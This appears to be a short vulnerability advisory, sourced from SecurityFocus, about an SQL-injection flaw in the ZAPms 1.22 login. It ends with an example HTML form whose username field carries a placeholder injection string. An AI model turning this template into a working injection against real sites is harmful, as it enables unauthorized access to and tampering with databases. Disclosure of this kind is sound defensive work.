15 lines
No EOL
759 B
Text
15 lines
No EOL
759 B
Text
source: https://www.securityfocus.com/bid/47782/info
|
|
|
|
ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
ZAPms 1.22 is vulnerable; other versions may also be affected.
|
|
|
|
The following example request is available:
|
|
|
|
<form action="http://www.example.com/[path]/?sid=1" method="post" id="Login" >
|
|
<input name="nick" type="text" id="nick" value="'SQL+CODE+HERE" />
|
|
<input name="pwd" id="pwd" type="password" value="adminpwd" />
|
|
<input name="submit" type="submit" class="submit_login" value="Login" />
|
|
</form> |